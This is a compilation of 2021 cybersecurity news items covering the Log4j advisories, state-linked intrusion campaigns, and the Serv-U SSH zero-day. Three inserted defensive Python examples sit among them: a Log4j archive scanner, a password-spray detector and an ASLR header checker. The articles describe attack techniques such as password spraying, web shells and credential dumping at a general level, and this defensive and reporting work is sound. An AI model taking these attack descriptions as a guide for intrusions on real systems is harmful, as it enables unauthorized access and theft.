CISA, FBI and NSA Publish Joint Advisory and Scanner for Log4j Vulnerabilities
27.12.2021 BigBrothers Thehackernews
Cybersecurity agencies from Australia, Canada, New Zealand, the U.S., and the U.K. on Wednesday released a joint advisory in response to widespread exploitation of multiple vulnerabilities in Apache's Log4j software library by nefarious adversaries.
"These vulnerabilities, especially Log4Shell, are severe," the intelligence agencies said in the new guidance. "Sophisticated cyber threat actors are actively scanning networks to potentially exploit Log4Shell, CVE-2021-45046, and CVE-2021-45105 in vulnerable systems. These vulnerabilities are likely to be exploited over an extended period."
An attacker can exploit Log4Shell (CVE-2021-44228) by getting a vulnerable system to log a specially crafted string, which causes that system to execute arbitrary code. CVE-2021-45046 allows remote code execution in certain non-default configurations, while CVE-2021-45105 could be leveraged by a remote attacker to cause a denial-of-service (DoS) condition.
Since the vulnerabilities became public knowledge this month, unpatched servers have come under siege from actors ranging from ransomware groups to nation-state hackers, who have used the flaw as an entry point into networks to deploy Cobalt Strike beacons, cryptominers, and botnet malware.
The U.S. Federal Bureau of Investigation's (FBI) assessment of the attacks has also raised the possibility that threat actors are incorporating the flaws into "existing cyber criminal schemes that are looking to adopt increasingly sophisticated obfuscation techniques." In light of the severity of the vulnerabilities and likely increased exploitation, organizations are being urged to identify, mitigate, and update affected assets as soon as possible.
To that end, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has also released a scanner utility to identify systems vulnerable to the Log4Shell vulnerability, mirroring a similar tool released by the CERT Coordination Center (CERT/CC).
However, Israeli cybersecurity firm Rezilion, in an assessment published this week, found that commercial scanning tools were ill-equipped to detect all formats of the Log4j library in an environment due to the fact that the instances are often deeply nested in other code, revealing the "blindspots" in such utilities and the limitations of static scanning.
"The biggest challenge lies in detecting Log4Shell within packaged software in production environments: Java files (such as Log4j) can be nested a few layers deep into other files — which means that a shallow search for the file won't find it," Yotam Perkal, vulnerability research lead at Rezilion, said. "Furthermore, they may be packaged in many different formats which creates a real challenge in digging them inside other Java packages."
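The nesting problem Rezilion describes is easy to reproduce: a log4j-core jar sitting inside a WAR inside an EAR is invisible to a filename search over the outer archive. The following is an added example, not Rezilion's or CISA's tool. It recursively opens every zip-based archive it finds, looks for the JndiLookup class (the class whose removal from the classpath was one of the recommended mitigations), reads the Maven version from log4j-core's pom.properties, and flags anything below 2.17.0. The 2.17.0 threshold is a simplification that ignores the Java 6/7 backport branches (2.3.x, 2.12.x); the sample EAR it builds is constructed test input. Standard library only.

```python
"""Recursive scan of Java archives (JAR/WAR/EAR/ZIP) for embedded Log4j 2 copies."""
import io
import re
import sys
import zipfile

# Class implementing the JNDI lookup; ships in every log4j-core jar
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Maven metadata that log4j-core carries inside the jar
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXTS = (".jar", ".war", ".ear", ".zip")


def _version_from_pom(zf: zipfile.ZipFile):
    """Read the version= line from log4j-core's pom.properties, if present."""
    try:
        props = zf.read(POM_PROPS).decode("utf-8", "replace")
    except KeyError:
        return None
    for line in props.splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def scan_archive(data: bytes, path: str = "<root>", depth: int = 0, max_depth: int = 8) -> list:
    """Return [(nested_path, version_or_None), ...] for every archive, at any nesting
    depth, that contains JndiLookup.class. Nested paths use '!' like jar: URLs."""
    findings = []
    if depth > max_depth:
        return findings
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings          # not a zip container: nothing to descend into
    names = zf.namelist()
    if JNDI_LOOKUP in names:
        findings.append((path, _version_from_pom(zf)))
    for name in names:
        if name.lower().endswith(ARCHIVE_EXTS):
            findings.extend(scan_archive(zf.read(name), f"{path}!{name}", depth + 1, max_depth))
    return findings


def needs_attention(version) -> bool:
    """True when the version is unknown or below 2.17.0 (fixes for CVE-2021-44228,
    -45046 and -45105 landed in 2.15.0, 2.16.0 and 2.17.0 respectively)."""
    if version is None:
        return True
    parts = tuple(int(n) for n in re.findall(r"\d+", version)[:3])
    return (parts + (0, 0, 0))[:3] < (2, 17, 0)


def _zip_bytes(entries: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def build_sample_archive() -> bytes:
    """Constructed test input: an EAR wrapping a WAR wrapping log4j-core 2.14.1.
    A shallow filename search for 'log4j' on the EAR itself finds nothing."""
    core = _zip_bytes({
        JNDI_LOOKUP: b"\xca\xfe\xba\xbe",   # placeholder bytes, not a real class file
        POM_PROPS: b"version=2.14.1\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n",
    })
    war = _zip_bytes({
        "WEB-INF/lib/log4j-core-2.14.1.jar": core,
        "WEB-INF/lib/other-lib.jar": _zip_bytes({"com/example/Foo.class": b"\xca\xfe\xba\xbe"}),
    })
    return _zip_bytes({"META-INF/application.xml": b"<application/>", "app.war": war})


if __name__ == "__main__":
    targets = [(p, open(p, "rb").read()) for p in sys.argv[1:]] or [("sample.ear", build_sample_archive())]
    for label, blob in targets:
        for nested_path, version in scan_archive(blob, label):
            flag = "REVIEW" if needs_attention(version) else "ok"
            print(f"{flag:6} {nested_path} version={version or 'unknown'}")
```

Run it with one or more archive paths as arguments; with none it scans the constructed sample and reports the nested log4j-core jar two levels down. It does not catch shaded or repackaged copies where the class was renamed, which is why a runtime check (the library's own version string in a JVM heap or classpath dump) remains worth doing alongside static scanning.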
The public disclosure of Log4Shell has also led a number of technology suppliers to deploy patches for software that contain the flaw. The latest companies to issue updates are NVIDIA and HPE, joining a long list of vendors that have published security advisories detailing the products that are affected by the vulnerability.
The latest step taken by the governments arrives as the Apache Software Foundation (ASF) on Monday released updates for Apache HTTP Server to address two flaws — CVE-2021-44790 (CVSS score: 9.8) and CVE-2021-44224 (CVSS score: 8.2) — the former of which could be weaponized by a remote attacker to execute arbitrary code and take control of an affected system.
China suspends deal with Alibaba for not sharing Log4j 0-day first with the government
27.12.2021 BigBrothers Thehackernews
China's internet regulator, the Ministry of Industry and Information Technology (MIIT), has suspended a partnership with Alibaba Cloud, the cloud computing subsidiary of e-commerce giant Alibaba Group, for six months because the company failed to promptly inform the government about a critical security vulnerability in the widely used Log4j logging library.
The development was disclosed by Reuters and South China Morning Post, citing a report from 21st Century Business Herald, a Chinese business-news daily newspaper.
"Alibaba Cloud did not immediately report vulnerabilities in the popular, open-source logging framework Apache Log4j2 to China's telecommunications regulator," Reuters said. "In response, MIIT suspended a cooperative partnership with the cloud unit regarding cybersecurity threats and information-sharing platforms."
Tracked as CVE-2021-44228 (CVSS score: 10.0) and codenamed Log4Shell or LogJam, the catastrophic security shortcoming allows malicious actors to remotely execute arbitrary code by getting a specially crafted string logged by the software.
Log4Shell came to light after Chen Zhaojun of Alibaba Cloud's security team emailed the Apache Software Foundation (ASF) on November 24 to report the flaw, noting that it "has a major impact." But while the fix was still being prepared, details of the vulnerability were posted on a Chinese blogging platform by an unidentified actor on December 8, sending the Apache team scrambling to release a patch on December 10.
Since the bug's public disclosure, Log4Shell has been widely exploited by threat actors to take control of susceptible servers, owing to the near-ubiquitous use of the library, which is found in a wide range of consumer and enterprise services, websites, and applications, as well as in operational technology products, that rely on it to log security and performance information.
In the ensuing days, further investigation into Log4j by the cybersecurity community has since uncovered three more weaknesses in the Java-based tool, prompting the project maintainers to ship a series of security updates to contain real-world attacks exploiting the flaws.
Israeli security firm Check Point noted that it has blocked over 4.3 million exploitation attempts so far, with 46% of those intrusions made by known malicious groups. "This vulnerability may cause the device to be remotely controlled, which will cause serious hazards such as theft of sensitive information and device service interruption," the MIIT had previously said in a public statement published on December 17, adding it was only made aware of the flaw on December 9, 15 days after the initial disclosure.
The pushback from MIIT comes months after the Chinese government issued stricter vulnerability disclosure regulations that require software and networking vendors affected by critical flaws, as well as entities or individuals engaged in discovering network product security vulnerabilities, to report them to the government authorities within two days.
In September, the government also followed it up by launching "cyberspace security and vulnerability professional databases" for the reporting of security vulnerabilities in networks, mobile apps, industrial control systems, smart cars, IoT devices, and other internet products that could be targeted by threat actors.
Update: After China's internet security regulator dropped Alibaba Cloud from its cyber threat intelligence partnership for six months, the cloud computing company on Thursday said it would work towards improving its risk management and compliance, according to a new report from the South China Morning Post. Alibaba Cloud also said it did not fully comprehend the severity of the flaw and that it did not share the details with the government in a timely fashion.
CISA Issues Warning On Cyber Threats Targeting Water and Wastewater Systems
16.10.21 BigBrothers Thehackernews
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday warned of continued ransomware attacks aimed at disrupting water and wastewater systems (WWS) facilities, highlighting five incidents that occurred between March 2019 and August 2021.
"This activity—which includes attempts to compromise system integrity via unauthorized access—threatens the ability of WWS facilities to provide clean, potable water to, and effectively manage the wastewater of, their communities," CISA, along with the Federal Bureau of Investigation (FBI), the Environmental Protection Agency (EPA), and the National Security Agency (NSA), said in a joint bulletin.
Citing spear-phishing, outdated operating systems and software, and control system devices running vulnerable firmware versions as the primary intrusion vectors, the agencies singled out five cyber attacks from 2019 to 2021 targeting the WWS Sector —
A former employee at a Kansas-based WWS facility unsuccessfully attempted to remotely access a facility computer in March 2019 using credentials that had not been revoked
Compromise of files and a likely Makop ransomware infection observed at a New Jersey-based WWS facility in September 2020
An unknown ransomware variant deployed against a Nevada-based WWS facility in March 2021
ZuCaNo ransomware introduced onto a Maine-based WWS facility's wastewater SCADA computer in July 2021
A Ghost variant ransomware attack against a California-based WWS facility in August 2021
The advisory is notable in the wake of a February 2021 attack on a water treatment facility in Oldsmar, Florida, where an intruder broke into a computer system and remotely changed a setting that drastically altered the level of sodium hydroxide (NaOH) in the water supply. A plant operator spotted the change and quickly reversed the remotely issued command.
In addition to requiring multi-factor authentication for all remote access to the operational technology (OT) network, the agencies urged WWS facilities to limit remote access to only relevant users, segment IT and OT networks to prevent lateral movement, and maintain the ability to fail over to alternate control systems in the event of an attack.
Microsoft Warns of Iran-Linked Hackers Targeting US and Israeli Defense Firms
13.10.21 BigBrothers Thehackernews
An emerging threat actor likely supporting Iranian national interests has been behind a password spraying campaign targeting US, EU, and Israeli defense technology companies, with additional activity observed against regional ports of entry in the Persian Gulf as well as maritime and cargo transportation companies focused in the Middle East.
Microsoft is tracking the hacking crew under the moniker DEV-0343.
The intrusions, first observed in late July 2021, are believed to have targeted more than 250 Office 365 tenants, fewer than 20 of which were successfully compromised following a password spray attack, a type of brute-force attack in which the same password is tried against many different usernames, so that each account sees only a few attempts and lockout thresholds are not triggered.
Indications thus far allude to the possibility that the activity is part of an intellectual property theft campaign aimed at government partners producing military-grade radars, drone technology, satellite systems, and emergency response communication systems with the likely goal of stealing commercial satellite images and proprietary information.
DEV-0343's Iranian connection is based on evidence of "extensive crossover in geographic and sectoral targeting with Iranian actors, and alignment of techniques and targets with another actor originating in Iran," researchers from Microsoft Threat Intelligence Center (MSTIC) and Digital Security Unit (DSU) said.
The password sprays emulate Firefox and Google Chrome browsers and rely on a series of unique Tor proxy IP addresses expressly used to obfuscate their operational infrastructure. Noting that the attacks peaked between Sunday and Thursday from 7:30 AM to 8:30 PM Iran Time (4:00 AM to 5:00 PM UTC), Microsoft said dozens to hundreds of accounts within an entity were targeted depending on the size.
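The pattern described above (many accounts, few attempts each, one source, a fixed working window) is what a detection should key on, since per-account lockout counters never fire during a spray. The following is an added example, not Microsoft's detection logic. It groups failed sign-ins by source IP, slides a one-hour window over them, and raises an alert when a window covers at least ten distinct accounts with no account tried more than three times; a conventional brute force against one account is the mirror image and is deliberately not flagged. The records are constructed to resemble Azure AD sign-in log fields (time, user, ip, status, ua); error codes 50126 (invalid credentials) and 50053 (account locked) are treated as failures, and the Sunday-to-Thursday, 04:00-17:00 UTC annotation is taken from the article's description of DEV-0343. Adjust field names and thresholds to your own export.

```python
"""Password-spray detection over sign-in records (constructed sample data)."""
from collections import Counter, defaultdict
from datetime import datetime, timedelta, timezone

FAILURE_CODES = {50126, 50053}      # invalid username/password, account locked
# Sunday-Thursday, 04:00-17:00 UTC: the working pattern reported for DEV-0343
ACTOR_DAYS = {6, 0, 1, 2, 3}         # datetime.weekday(): Monday=0 ... Sunday=6
ACTOR_HOURS = range(4, 17)


def parse_time(ts: str) -> datetime:
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def within_reported_hours(t: datetime) -> bool:
    return t.weekday() in ACTOR_DAYS and t.hour in ACTOR_HOURS


def detect_spray(events, window=timedelta(hours=1), min_users=10, max_per_user=3):
    """Flag a source IP when, inside one sliding window, its failed sign-ins cover at
    least min_users distinct accounts and no account is tried more than max_per_user
    times. The widest qualifying window per IP is reported."""
    failures = defaultdict(list)
    for e in events:
        if e["status"] in FAILURE_CODES:
            failures[e["ip"]].append((parse_time(e["time"]), e["user"], e["ua"]))
    alerts = []
    for ip, fails in failures.items():
        fails.sort()
        best = None
        start = 0
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:
                start += 1
            per_user = Counter(user for _, user, _ in fails[start:end + 1])
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                if best is None or len(per_user) > best[0]:
                    best = (len(per_user), start, end)
        if best:
            distinct, s, e = best
            alerts.append({
                "ip": ip,
                "distinct_users": distinct,
                "attempts": e - s + 1,
                "first": fails[s][0].isoformat(),
                "last": fails[e][0].isoformat(),
                "user_agents": sorted({ua for _, _, ua in fails[s:e + 1]}),
                "within_reported_hours": within_reported_hours(fails[s][0]),
            })
    return alerts


def _event(t, user, ip, status, ua):
    return {"time": t.strftime("%Y-%m-%dT%H:%M:%SZ"), "user": user, "ip": ip, "status": status, "ua": ua}


# Constructed sample: 1 August 2021 was a Sunday; the addresses are documentation ranges.
_BASE = datetime(2021, 8, 1, 4, 2, 10, tzinfo=timezone.utc)
_UA = "Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0"
SAMPLE_EVENTS = (
    # one source tries one password against 30 accounts, 20 seconds apart
    [_event(_BASE + timedelta(seconds=20 * i), f"user{i:02d}@example.test", "198.51.100.7", 50126, _UA)
     for i in range(30)]
    # a second source touches only 5 accounts: below the distinct-user threshold
    + [_event(_BASE + timedelta(seconds=45 * i), f"staff{i}@example.test", "203.0.113.50", 50126, _UA)
       for i in range(5)]
    # a real user mistyping a password three times, then succeeding (status 0)
    + [_event(_BASE + timedelta(minutes=m), "bob@example.test", "203.0.113.9", 50126, _UA) for m in (1, 2, 3)]
    + [_event(_BASE + timedelta(minutes=4), "bob@example.test", "203.0.113.9", 0, _UA)]
)

if __name__ == "__main__":
    for alert in detect_spray(SAMPLE_EVENTS):
        print(alert)
```

Grouping by source IP is the weakest part of this when the attacker rotates through Tor exits, as the article says DEV-0343 did; in that case group on the spoofed user agent plus tenant, or on the set of targeted accounts, and treat the hour-of-day annotation as supporting evidence rather than a filter, since working hours are trivial for an actor to change.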
The Redmond-based tech giant also pointed out the password spraying tool's similarities to that of "o365spray," an actively updated open-source utility aimed at Microsoft Office 365, and is now urging customers to enable multi-factor authentication to mitigate compromised credentials and prohibit all incoming traffic from anonymizing services wherever applicable.
"Gaining access to commercial satellite imagery and proprietary shipping plans and logs could help Iran compensate for its developing satellite program," the researchers said. "Given Iran's past cyber and military attacks against shipping and maritime targets, Microsoft believes this activity increases the risk to companies in these sectors."
New U.S. Government Initiative Holds Contractors Accountable for Cybersecurity
9.10.21 BigBrothers Thehackernews
The U.S. government on Wednesday announced the formation of a new Civil Cyber-Fraud Initiative that aims to hold contractors accountable for failing to meet cybersecurity requirements intended to safeguard public sector information and infrastructure.
"For too long, companies have chosen silence under the mistaken belief that it is less risky to hide a breach than to bring it forward and to report it," said Deputy Attorney General Monaco in a press statement. "Well that changes today, [and] we will use our civil enforcement tools to pursue companies, those who are government contractors who receive federal funds, when they fail to follow required cybersecurity standards — because we know that puts all of us at risk."
The Civil Cyber-Fraud Initiative is part of the U.S. Justice Department's (DoJ) efforts to build resilience against intrusions and to hold companies accountable for knowingly providing deficient cybersecurity products or services, misrepresenting their cybersecurity practices or protocols, or violating their obligations to monitor and report cybersecurity incidents and breaches.
To that end, the government intends to use the False Claims Act (FCA) to pursue contractors and grant recipients for cybersecurity-related fraud, such as failing to secure their networks or failing to adequately report security breaches.
In addition, the DoJ also announced the launch of a National Cryptocurrency Enforcement Team (NCET) to dismantle criminal abuse of cryptocurrency platforms, particularly focusing on "crimes committed by virtual currency exchanges, mixing and tumbling services, and money laundering infrastructure actors."
The developments also come nearly a week after the U.S. Federal Communications Commission (FCC) laid out new rules to prevent subscriber identity module (SIM) swapping scams and port-out fraud, both of which are tactics used to move a victim's phone number and service to a SIM or carrier under the attacker's control.
The FCC's proposal would require amending existing Customer Proprietary Network Information (CPNI) and Local Number Portability rules to mandate wireless carriers to adopt secure methods of confirming the customer's identity before transferring their phone number to a new device or carrier. On top of that, the changes also suggest requiring providers to immediately notify customers whenever a SIM change or port request is made on their accounts.
Cybersecurity Firm Group-IB's CEO Arrested Over Treason Charges in Russia
6.10.21 BigBrothers Thehackernews
Russian authorities on Wednesday arrested Ilya Sachkov, the founder of cybersecurity firm Group-IB, and ordered him detained for two months in Moscow on charges of state treason, following a search of the company's office on September 28.
The Russian-founded company, which is now headquartered in Singapore, confirmed the development but noted the "reason for the search was not yet clear," adding: "The decentralized infrastructure of Group-IB allows us to keep our customers' data safe, maintain business operations and work without interruption across our offices in Russia and around the world."
Group-IB said the raid on its Moscow office had commenced on Tuesday, with law enforcement authorities leaving that same evening. Kremlin Spokesman Dmitry Peskov said the government was aware of the arrest but that it had no additional details about the case, Russian state news agency TASS reported.
The cybersecurity company relocated to Singapore in late 2018 as part of its attempts to distance itself from any ties to the Russian government. It is worth noting that the U.S. Department of Homeland Security banned Kaspersky products from all government departments on September 13, 2017, alleging that the company had worked on secret projects with Russia's Federal Security Service (FSB).
Group-IB is known for its assistance in a number of law enforcement operations spanning Europe, often collaborating with agencies such as Europol and Interpol on investigations that have led to the arrest of several organized cybercrime groups in recent years, including Fraud Family, Dr HeX, and three Nigerian nationals suspected of perpetrating business email compromise (BEC) scams.
If convicted of treason, Sachkov could face up to 20 years in prison.
3 Former U.S. Intelligence Officers Admit to Hacking for UAE Company
19.9.21 BigBrothers Thehackernews
The U.S. Department of Justice (DoJ) on Tuesday disclosed that three former intelligence community and military personnel will pay $1.68 million in penalties for their role as cyber-mercenaries working on behalf of a U.A.E.-based cybersecurity company.
The trio in question, Marc Baier, 49, Ryan Adams, 34, and Daniel Gericke, 40, are accused of conspiring (in the words of the court filing, to "knowingly and willfully combine, conspire, confederate, and agree with each other to commit offenses") to furnish defense services to persons and entities in the country over a three-year period beginning around December 2015 and continuing through November 2019, including developing invasive spyware capable of breaking into mobile devices without any action by the targets.
"The defendants worked as senior managers at a United Arab Emirates (U.A.E.)-based company (U.A.E. CO) that supported and carried out computer network exploitation (CNE) operations (i.e., 'hacking') for the benefit of the U.A.E. government," the DoJ said in a statement.
"Despite being informed on several occasions that their work for [the] U.A.E. CO, under the International Traffic in Arms Regulations (ITAR), constituted a 'defense service' requiring a license from the State Department's Directorate of Defense Trade Controls (DDTC), the defendants proceeded to provide such services without a license."
Besides charging the individuals for violations of U.S. export control, computer fraud and access device fraud laws, the hackers-for-hire are alleged to have supervised the creation of sophisticated 'zero-click' exploits that were subsequently weaponized to illegally amass credentials for online accounts issued by U.S. companies, and to obtain unauthorized access to mobile phones around the world.
The development follows a prior investigation by Reuters in 2019, which revealed how former U.S. National Security Agency (NSA) operatives helped the U.A.E. surveil prominent Arab media figures, dissidents, and several unnamed U.S. journalists as part of a clandestine operation dubbed Project Raven undertaken by a cybersecurity company named DarkMatter. The company's propensity to recruit "cyberwarriors from abroad" to research offensive security techniques first came to light in 2016.
The deep-dive report also detailed a zero-click exploit called Karma that made it possible to remotely hack into iPhones of activists, diplomats and rival foreign leaders "simply by uploading phone numbers or email accounts into an automated targeting system." The sophisticated tool was used to retrieve photos, emails, text messages and location information from the victims' phones as well as harvest saved passwords, which could be abused to stage further intrusions.
According to unsealed court documents, Baier, Adams and Gericke designed, implemented, and used Karma for foreign intelligence gathering purposes starting in May 2016, after obtaining an exploit from an unnamed U.S. company that granted zero-click remote access to Apple devices. But after the underlying security weakness was plugged in September 2016, the defendants allegedly contacted another U.S. firm to acquire a second exploit that utilized a different vulnerability in iOS, ultimately using it to rearchitect and modify the Karma exploitation toolkit.
The charges also arrive a day after Apple divulged that it acted to close a zero-day vulnerability (CVE-2021-30860) exploited by NSO Group's Pegasus spyware to target activists in Bahrain and Saudi Arabia.
"The FBI will fully investigate individuals and companies that profit from illegal criminal cyber activity," said Assistant Director Bryan Vorndran of the FBI's Cyber Division. "This is a clear message to anybody, including former U.S. government employees, who had considered using cyberspace to leverage export-controlled information for the benefit of a foreign government or a foreign commercial company – there is risk, and there will be consequences."
Update: A new report from MIT Technology Review has now revealed that the vulnerability that the KARMA platform leveraged to take full control of a target's iPhone was in Apple's iMessage app and that the exploit was developed and sold by an American company named Accuvant, which has since merged with Optiv.
"Accuvant sold hacking exploits to multiple customers in both governments and the private sector, including the United States and its allies — and this exact iMessage exploit was also sold simultaneously to multiple other customers," the report said.
In a separate development, VPN provider ExpressVPN said it was aware of Daniel Gericke's previous employment before hiring him. Gericke, who is currently the Chief Information Officer at the company, is one of the three individuals who have been implicated for their unlicensed work as mercenary hackers directing U.A.E.-funded intrusion campaigns.
"We've known the key facts relating to Daniel's employment history since before we hired him, as he disclosed them proactively and transparently with us from the start," the company said in a statement. "In fact, it was his history and expertise that made him an invaluable hire for our mission to protect users' privacy and security."
Experts Link Sidewalk Malware Attacks to Grayfly Chinese Hacker Group
10.9.21 BigBrothers Thehackernews
A previously undocumented backdoor that was recently found targeting an unnamed computer retail company based in the U.S. has been linked to a longstanding Chinese espionage operation dubbed Grayfly.
In late August, Slovakian cybersecurity firm ESET disclosed details of an implant called SideWalk, which is designed to load arbitrary plugins sent from an attacker-controlled server, gather information about running processes in the compromised systems, and transmit the results back to the remote server.
The cybersecurity firm attributed the intrusion to a group it tracks as SparklingGoblin, an adversary believed to be connected to the Winnti (aka APT41) malware family.
But latest research published by researchers from Broadcom's Symantec has pinned the SideWalk backdoor on the China-linked espionage group, pointing out the malware's overlaps with the older Crosswalk malware, with the latest Grayfly hacking activities singling out a number of organizations in Mexico, Taiwan, the U.S., and Vietnam.
"A feature of this recent campaign was that a large number of targets were in the telecoms sector. The group also attacked organizations in the IT, media, and finance sectors," Symantec's Threat Hunter Team said in a write-up published on Thursday.
Known to be active since at least March 2017, Grayfly functions as the "espionage arm of APT41" and is notorious for targeting a variety of industries in pursuit of sensitive data. Its typical intrusion chain exploits public-facing Microsoft Exchange or MySQL servers to install web shells for initial access, then spreads laterally across the network and installs additional backdoors that let the threat actor maintain remote access and exfiltrate the collected information.
In one instance observed by Symantec, the adversary's activity began with the targeting of an internet-reachable Microsoft Exchange server to gain an initial foothold in the network. This was followed by a string of PowerShell commands to install an unidentified web shell, ultimately leading to the deployment of the SideWalk backdoor and a custom variant of the Mimikatz credential-dumping tool that has been used in previous Grayfly attacks.
"Grayfly is a capable actor, likely to continue to pose a risk to organizations in Asia and Europe across a variety of industries, including telecommunications, finance, and media," the researchers said. "It's likely this group will continue to develop and improve its custom tools to enhance evasion tactics along with using commodity tools such as publicly available exploits and web shells to assist in their attacks."
Microsoft Says Chinese Hackers Were Behind SolarWinds Serv-U SSH 0-Day Attack
5.9.21 BigBrothers Thehackernews
Microsoft has shared technical details about a now-fixed, actively exploited critical security vulnerability affecting SolarWinds Serv-U managed file transfer service that it has attributed with "high confidence" to a threat actor operating out of China.
In mid-July, the Texas-based company patched a remote code execution flaw (CVE-2021-35211) in Serv-U's implementation of the Secure Shell (SSH) protocol that could be abused by attackers to run arbitrary code on the affected system, including installing malicious programs and viewing, changing, or deleting sensitive data.
"The Serv-U SSH server is subject to a pre-auth remote code execution vulnerability that can be easily and reliably exploited in the default configuration," Microsoft Offensive Research and Security Engineering team said in a detailed write-up describing the exploit.
"An attacker can exploit this vulnerability by connecting to the open SSH port and sending a malformed pre-auth connection request. When successfully exploited, the vulnerability could then allow the attacker to install or run programs, such as in the case of the targeted attack we previously reported," the researchers added.
Microsoft had linked the attacks to DEV-0322, a China-based group, citing "observed victimology, tactics, and procedures." The company has now revealed that the remote, pre-auth vulnerability stemmed from the way the Serv-U process handled access violations without terminating, which let attackers make repeated exploitation attempts stealthily and reliably.
"The exploited vulnerability was caused by the way Serv-U initially created an OpenSSL AES128-CTR context," the researchers said. "This, in turn, could allow the use of uninitialized data as a function pointer during the decryption of successive SSH messages."
"Therefore, an attacker could exploit this vulnerability by connecting to the open SSH port and sending a malformed pre-auth connection request. We also discovered that the attackers were likely using DLLs compiled without address space layout randomization (ASLR) loaded by the Serv-U process to facilitate exploitation," the researchers added.
ASLR is a protection mechanism that randomizes the base addresses at which executables and libraries (along with the stack and heap) are mapped into a process, so that memory-corruption exploits such as buffer overflows cannot rely on hardcoded addresses. Its benefit is lost for the whole process if even one loaded module was built without it, since that module's addresses stay fixed from run to run.
Microsoft, which disclosed the attack to SolarWinds, said it recommended enabling ASLR compatibility for all binaries loaded in the Serv-U process. "ASLR is a critical security mitigation for services which are exposed to untrusted remote inputs, and requires that all binaries in the process are compatible in order to be effective at preventing attackers from using hardcoded addresses in their exploits, as was possible in Serv-U," the researchers said.
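Whether a module asks for ASLR is recorded in its PE header, so Microsoft's recommendation can be checked offline against every DLL a service loads. The following is an added example, not Microsoft's or SolarWinds' code. It parses the headers of a PE file and reports the IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE, HIGH_ENTROPY_VA and NX_COMPAT flags, plus the caveat practitioners often miss: a module with the dynamic-base flag but IMAGE_FILE_RELOCS_STRIPPED set cannot actually be rebased. Offsets follow the PE/COFF specification (e_lfanew at 0x3C, a 20-byte COFF header after the PE signature, DllCharacteristics at offset 70 of the optional header in both PE32 and PE32+). The header-only images it builds for testing are constructed stand-ins, not real binaries.

```python
"""Report ASLR-related PE header flags for DLLs and EXEs (standard library only)."""
import struct
import sys

IMAGE_FILE_RELOCS_STRIPPED = 0x0001                # COFF Characteristics: no .reloc, cannot be rebased
IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA = 0x0020  # 64-bit ASLR
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040     # "ASLR compatible" (linker /DYNAMICBASE)
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100        # DEP compatible


def parse_pe_headers(data: bytes) -> dict:
    """Return machine type, COFF Characteristics and optional-header DllCharacteristics."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    coff = e_lfanew + 4
    (machine,) = struct.unpack_from("<H", data, coff)
    (characteristics,) = struct.unpack_from("<H", data, coff + 18)
    opt = coff + 20                                   # optional header follows the 20-byte COFF header
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic not in (0x10B, 0x20B):                   # PE32 / PE32+
        raise ValueError(f"unexpected optional header magic {magic:#x}")
    (dll_chars,) = struct.unpack_from("<H", data, opt + 70)
    return {"machine": machine, "pe32plus": magic == 0x20B,
            "characteristics": characteristics, "dll_characteristics": dll_chars}


def aslr_report(data: bytes) -> dict:
    """A module is ASLR-compatible only if it requests a dynamic base and kept its relocations."""
    h = parse_pe_headers(data)
    dynamic_base = bool(h["dll_characteristics"] & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)
    relocs_stripped = bool(h["characteristics"] & IMAGE_FILE_RELOCS_STRIPPED)
    return {
        "dynamic_base": dynamic_base,
        "high_entropy_va": bool(h["dll_characteristics"] & IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA),
        "nx_compat": bool(h["dll_characteristics"] & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
        "relocs_stripped": relocs_stripped,
        "aslr_compatible": dynamic_base and not relocs_stripped,
    }


def build_minimal_pe(dll_chars: int, pe32plus: bool = True, relocs_stripped: bool = False) -> bytes:
    """Constructed header-only PE image (no sections) used to exercise the parser."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)            # PE signature immediately after the DOS header
    opt_size = 240 if pe32plus else 224
    characteristics = 0x2002 | (IMAGE_FILE_RELOCS_STRIPPED if relocs_stripped else 0)   # DLL | EXECUTABLE_IMAGE
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C, 0, 0, 0, 0, opt_size, characteristics)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    struct.pack_into("<H", opt, 70, dll_chars)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    samples = [(p, open(p, "rb").read()) for p in sys.argv[1:]] or [
        ("hardened.dll (constructed)", build_minimal_pe(
            IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE | IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA
            | IMAGE_DLLCHARACTERISTICS_NX_COMPAT)),
        ("legacy.dll (constructed)", build_minimal_pe(IMAGE_DLLCHARACTERISTICS_NX_COMPAT)),
    ]
    for name, blob in samples:
        report = aslr_report(blob)
        verdict = "ok" if report["aslr_compatible"] else "NO ASLR"
        print(f"{verdict:8} {name}: {report}")
```

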